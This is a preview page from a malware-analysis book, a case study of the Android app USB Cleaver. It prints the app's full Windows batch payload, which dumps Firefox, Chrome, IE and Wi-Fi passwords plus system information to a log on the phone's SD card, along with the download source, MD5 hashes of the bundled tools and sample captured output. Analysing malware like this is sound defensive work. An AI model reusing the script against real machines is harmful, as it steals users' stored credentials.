O'Reilly logo

Android Malware and Analysis by Tim Strazzere, Jose Andre Morales, Manu Quintans, Shane Hartman, Ken Dunham

Stay ahead with the world's most comprehensive technology and business learning platform.

With Safari, you learn the way you learn best. Get unlimited access to videos, live online training, learning paths, books, tutorials, and more.

Start Free Trial

No credit card required

190
android Malware and analysis
IF EXIST f:\usbcleaver\config\Drive_Location.cfg SET flshdrv
= f:
IF EXIST%flshdrv%\usbcleaver\config\Drive_Location.cfg GOTO
FlshDrvFound
IF EXIST e:\usbcleaver\config\Drive_Location.cfg SET flshdrv
= e:
IF EXIST%flshdrv%\usbcleaver\config\Drive_Location.cfg GOTO
FlshDrvFound
IF EXIST d:\usbcleaver\config\Drive_Location.cfg SET flshdrv
= d:
IF EXIST%flshdrv%\usbcleaver\config\Drive_Location.cfg GOTO
FlshDrvFound
IF EXIST c:\usbcleaver\config\Drive_Location.cfg SET flshdrv
= c:
IF EXIST%flshdrv%\usbcleaver\config\Drive_Location.cfg GOTO
FlshDrvFound
IF EXIST b:\usbcleaver\config\Drive_Location.cfg SET flshdrv
= b:
IF EXIST%flshdrv%\usbcleaver\config\Drive_Location.cfg GOTO
FlshDrvFound
GOTO END
:FlshDrvFound
:: Checks to see if the payload is disarmed
IF NOT EXIST%flshdrv%\usbcleaver\config\Disarm_Payload.cfg
GOTO SkipDisarm
IF EXIST%flshdrv%\usbcleaver\config\Disarm_Payload.cfg GOTO
End
:SkipDisarm
:: Sets Variables and paths to clean up pathnams later on
IF NOT EXIST%flshdrv%\usbcleaver\logs\%computername%
MD%flshdrv%\usbcleaver\logs\%computername%
SET t =%time:~0,2%_%time:~3,2%_%time:~6,2%
SET logdir = “%flshdrv%\usbcleaver\logs\%computername%”
SET log = “%flshdrv%\usbcleaver\logs\%computername%\%computer
name%-[%t%].log”
SET tmplog = “%flshdrv%\usbcleaver\logs\%computername%\%compu
tername%_TEMP.log”
SET progdir = “%flshdrv%\usbcleaver\system\”
SET config = “%flshdrv%\usbcleaver\config\”
SET installdir = “%flshdrv%\usbcleaver\system\install”
SET/p eipurl = <”%flshdrv%\usbcleaver\config\External_IP.cfg”
:: Header information
ECHO---------------------------------------------->%log% 2>&1
ECHO USB Cleaver Payload [Time Started:%DATE%%TIME%] >>%log%
2>&1
ECHO--------------------------------------------->>%log% 2>&1
ECHO Computer Name is:%computername% and the Logged on User
Is:%username% >>%log% 2>&1
191
Case study exaMPles
ECHO--------------------------------------------->>%log% 2>&1
ECHO +-----------------------------------------+ >>%log% 2>&1
ECHO + [System info] + >>%log% 2>&1
ECHO +-----------------------------------------+ >>%log% 2>&1
IPCONFIG/all >>%log% 2>&1
ECHO--------------------------------------------->>%log% 2>&1
Echo +-----------------------------------------+ >>%log% 2>&1
Echo + [Dump Firefox PW] + >>%log% 2>&1
Echo +-----------------------------------------+ >>%log% 2>&1
%progdir%\PasswordFox.exe /stext%tmplog% >>%log% 2>&1
COPY%log%+%tmplog%*%log% >> NUL
DEL/f/q%tmplog% >NUL
ECHO--------------------------------------------->>%log% 2>&1
ECHO +-----------------------------------------+ >>%log% 2>&1
ECHO + [Dump Chrome PW] + >>%log% 2>&1
ECHO +-----------------------------------------+ >>%log% 2>&1
.\ChromePass.exe/stext%tmplog% >>%log% 2>&1
COPY%log%+%tmplog%*%log% >> NUL
DEL/f/q%tmplog% >NUL
ECHO--------------------------------------------->>%log% 2>&1
ECHO +-----------------------------------------+ >>%log% 2>&1
ECHO + [Dump IE PW] + >>%log% 2>&1
ECHO +-----------------------------------------+ >>%log% 2>&1
.\iepv.exe/stext%tmplog% >>%log% 2>&1
COPY%log%+%tmplog%*%log% >> NUL
DEL/f/q%tmplog% >NUL
ECHO--------------------------------------------->>%log% 2>&1
ECHO +-----------------------------------------+ >>%log% 2>&1
ECHO + [Dump WIFI PW] + >>%log% 2>&1
ECHO +-----------------------------------------+ >>%log% 2>&1
.\WirelessKeyView.exe/stext%tmplog% >>%log% 2>&1
COPY%log%+%tmplog%*%log% >> NUL
DEL/f/q%tmplog% >NUL
ECHO. >>%log% 2>&1
ECHO--------------------------------------------->>%log% 2>&1
ECHO USB Cleaver Payload [Time Finished:%DATE%%TIME%] >>%log%
2>&1
ECHO--------------------------------------------->>%log% 2>&1
192
android Malware and analysis
2. e Log Files button opens a view to the log les that are
created during a successful run of go.bat. ese les will be
located on the SD card under usbcleaver/logs.
3. e Download Payloads is a download method to pull down
the utilities to actually perform the operations requested in
the Enable/Disable payloads section. When selected it will
go to the following URL: novaspirit.com/Downloads/, then
download a single le called usbcleaver.zip.
Image 9.9 USB Cleaver download.
e le is stored on an SD card under usbcleaver/system. Once
complete a number of utilities are extracted to the same directory
where they are now ready for execution. Table9.1 is a list of those
utilities and their MD5 hashes.
When plugged into a Windows machine, information is collected
from that machine and stored in a data le on the SD card under logs.
Following is an example of the information collected from the system.
193
Case study exaMPles
-------------------------------------------------------------
USB Cleaver Payload
-------------------------------------------------------------
Computer Name is: lab1 and the Logged on User Is: Bob
+------------------------+
+ [System info] +
+------------------------+
Windows IP Configuration
Host Name................. : lab1
Primary Dns Suffix ....... :
Node Type................. : Hybrid
IP Routing Enabled........ : No
WINS Proxy Enabled........ : No
Table9.1 Utilities and MD5 Hash Values
FILE MD5 HASH
usbcleaver.zip 95d2e5efc50749783eea9adf05f8030f
PORTQRY.EXE c6ac67f4076ca431acc575912c194245
PRODUKEY.EXE a5a16a3d55ab8d576ed0d1f07fb139ea
PSPV.EXE 35861f4ea9a8ecb6c357bdb91b7df804
RAR.EXE fa252d9b4bb354b4dca76e402d2a419e
servpw64.exe 06e54162b8b0324232fbf820c0c22496
softokn3.dll e846285b19405b11c8f19c1ed0a57292
ssleay32.dll f78ab032cc2b1d814c4a90dc224d696d
WGET.EXE 4bf24777ec95dcb3e03769def6816518
WIFIKE.EXE 6f4af9a8413e2180836e12554c5a10a9
WirelessKeyView.exe de64eeda1ca624c456c03c109feaab43
WUL.EXE 4e3c3ed0b6828d9c3058a16673ed1a6d
7za.exe 885e9eb42889ca547f4e3515dcde5d3d
BulletsPassView.exe 5476a6557e78ce7b5d1b43fe584b40f4
ChromePass.exe 7b641e136f446860c48a3a870523249f
Drive.ico 03dfd337bfc127a7ff64bc75ebdce8e2
fc.exe 1255ff2d9c66f0d17cf6d15302c8f996
HideConsole.exe abc6379205de2618851c4fcbf72112eb
iehv.exe b2d5574738cb4e772a1b849695c19a2a
LIBEAY32.DLL aa0ee1b153b075517c775cc260c7c8f8
libssl32.dll a323196665376c39c3f736d2cd737cf9
lsremora64.dll a65749ee53f55d034e8ccb057639c074
nspr4.dll 72414dfb0b112c664d2c8d1215674e09
nss3.dll 7ddbd64d87c94fd0b5914688093dd5c2
PasswordFox.exe 398f515c4d202d9c9c1f884ac50bc72c
plc4.dll c73ec58b42e66443fafc03f3a84dcef9
plds4.dll ee44d5d780521816c906568a8798ed2f
csrss.bat 736884655654624cd6fb4312e8ddbc63
194
android Malware and analysis
Ethernet adapter Ethernet:
Media State..................... : Media disconnected
Connection-specific DNS Suffix . :
Description..................... : Qualcomm Atheros AR8161
PCI-E Gigabit Ethernet Controller (NDIS 6.30)
Physical Address................ : 5C-F9-DD-E3-6F-E4
DHCP Enabled.................... : Yes
Autoconfiguration Enabled....... : Yes
Wireless LAN adapter Wi-Fi:
Connection-specific DNS Suffix . :
Description..................... : Dell Wireless 1703
802.11b|g|n (2.4GHz)
Physical Address................ : F4-B7-E2-AD-B1-C3
DHCP Enabled.................... : Yes
Autoconfiguration Enabled....... : Yes
Link-local IPv6 Address......... : fe80::c043:76c6:6984:810
7%3(Preferred)
IPv4 Address.................... : 192.168.255.21(Preferred)
Subnet Mask..................... : 255.255.255.0
Lease Obtained.................. : Thursday, March 20
Lease Expires................... : Saturday, March 22
Default Gateway................. : 192.168.10.1
DHCP Server..................... : 192.168.10.2
DHCPv6 IAID..................... : 334804962
DHCPv6 Client DUID.............. : 00-01-00-01-18-C1-11-AF-
5C-F9-DD-E3-6F-E4
DNS Servers..................... : 8.8.8.8
NetBIOS over Tcpip.............. : Enabled
---------------------------------------------------------
+----------------------------------+
+ [Dump Firefox PW] +
+----------------------------------+
---------------------------------------------------------
+----------------------------------+
+ [Dump Chrome PW] +
+----------------------------------+
---------------------------------------------------------
+----------------------------------+
+ [Dump IE PW] +
+----------------------------------+
---------------------------------------------------------
+----------------------------------+
+ [Dump WIFI PW] +
+----------------------------------+
---------------------------------------------------------
USB Cleaver Payload Finished
---------------------------------------------------------
Whois
DomainName: NOVASPIRIT.COM
RegistryDomainID:96860153_DOMAIN_COM-VRSN

With Safari, you learn the way you learn best. Get unlimited access to videos, live online training, learning paths, books, interactive tutorials, and more.

Start Free Trial

No credit card required